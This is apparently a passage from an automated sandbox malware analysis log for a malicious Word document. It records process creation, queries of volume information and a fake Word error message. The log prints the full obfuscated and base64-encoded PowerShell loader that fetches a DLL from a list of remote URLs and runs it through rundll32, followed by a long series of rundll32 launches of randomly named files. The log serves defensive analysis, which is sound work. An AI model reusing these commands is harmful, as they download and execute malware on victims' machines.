[Char]92)+$Rgb0fqp+('.'+('d'+'ll'));$D34S=('V5'+'9T');$Lz7468s=((']a'+'n')+('w[3'+':')+'//'+('hang'+'a')+('rla'+'s')+('tik.'+'c')+('o'+'m/'+'cgi')+('-bi'+'n/'+'Ui4')+('n'+'/@')+']a'+('nw[3'+':'+'//')+('p'+'adr'+'eesc'+'ap'+'es'+'.com/b'+'l')+('og/0'+'I/@')+(']'+'an')+'w['+('3:'+'//s')+'a'+'r'+'t'+'ur'+'e.'+('c'+'om/wp')+('-inc'+'l'+'u')+('des'+'/JD8'+'/@]')+('an'+'w')+('[3:'+'/')+'/s'+'e'+('o'+'.ud')+('aip'+'urkar'+'t.c')+'o'+('m/rx-'+'5'+'700')+'-6'+('hnr7/S'+'gms'+'/@')+(']anw'+'[3'+':/')+'/p'+'hu'+('on'+'g')+'ap'+('p'+'le')+('.c'+'om/'+'mess')+'e'+'ng'+('e'+'r-')+'so'+('un'+'d')+'-8'+'kw'+'kq'+'/Y'+('Fr7/@'+']anw'+'[')+('3s://'+'b')+('r'+'et')+'ts'+'ha'+('wmagic'+'.com'+'/co')+('nte'+'nt')+('/Y/'+'@]an')+('w'+'[3s://c'+'a'+'fecen'+'tral.vi')+('
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded seT-ItEM vaRiABLE:09P ([TyPE]("{0}{3}{2}{1}"-F 'Sy','ctOrY','.io.DIrE','steM')) ; seT-itEM ('V'+'Ar'+'iAbLE:av5'+'L'+'oR') ([tYpe]("{0}{7}{1}{3}{4}{6}{5}{2}"-f 'SyS','em.NeT.Serv','er','I','cepo','tManag','In','T') ) ; $ErrorActionPreference = (('S'+'ilen')+('tlyC'+'ont')+'i'+('n'+'ue'));$D81vl6l=$P12R + [char](64) + $O98E;$R_1Z=('K2'+'6E'); (Gci vArIABLe:09p ).VALue::"CREa`Te`DIr`e`CTOry"($HOME + (('B'+('G'+'FLq'+'pw_5iB'+'G')+('FF4w0'+'o')+'sc'+('BG'+'F')) -CRepLAcE('BG'+'F'),[cHar]92));$C69V=('U9'+'4V'); ( VAriablE ("Av5"+"Lo"+"r") -vAluEon )::"s`EcURi`Typ`ROt`Ocol" = (('Tl'+'s')+'12');$N80V=('F8'+'8Y');$Rgb0fqp = (('R9'+'5')+'F');$H23I=('V'+('0'+'4P'));$Gqlw9td=$HOME+(('{0}Lq'+'pw_5i{0}'+'F'+'4w'+'0osc{0}')-f [Char]92)+$Rgb0fqp+('.'+('d'+'ll'));$D34S=('V5'+'9T');$Lz7468s=((']a'+'n')+('w[3'+':')+'//'+('hang'+'a')+('rla'+'s')+('tik.'+'c')+('o'+'m/'+'cgi')+('-bi'+'n/'+'Ui4')+('n'+'/@')+']a'+('nw[3'+':'+'//')+('p'+'adr'+'eesc'+'ap'+'es'+'.com/b'+'l')+('og/0'+'I/@')+(']'+'an')+'w['+('3:'+'//s')+'a'+'r'+'t'+'ur'+'e.'+('c'+'om/wp')+('-inc'+'l'+'u')+('des'+'/JD8'+'/@]')+('an'+'w')+('[3:'+'/')+'/s'+'e'+('o'+'.ud')+('aip'+'urkar'+'t.c')+'o'+('m/rx-'+'5'+'700')+'-6'+('hnr7/S'+'gms'+'/@')+(']anw'+'[3'+':/')+'/p'+'hu'+('on'+'g')+'ap'+('p'+'le')+('.c'+'om/'+'mess')+'e'+'ng'+('e'+'r-')+'so'+('un'+'d')+'-8'+'kw'+'kq'+'/Y'+('Fr7/@'+']anw'+'[')+('3s://'+'b')+('r'+'et')+'ts'+'ha'+('wmagic'+'.com'+'/co')+('nte'+'nt')+('/Y/'+'@]an')+('w'+'[3s://c'+'a'+'fecen'+'tral.vi')+('Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kviedw\vklxa.red',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rqvte\amll.nuu',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAO
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C5A cpuid 7_2_10004C5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
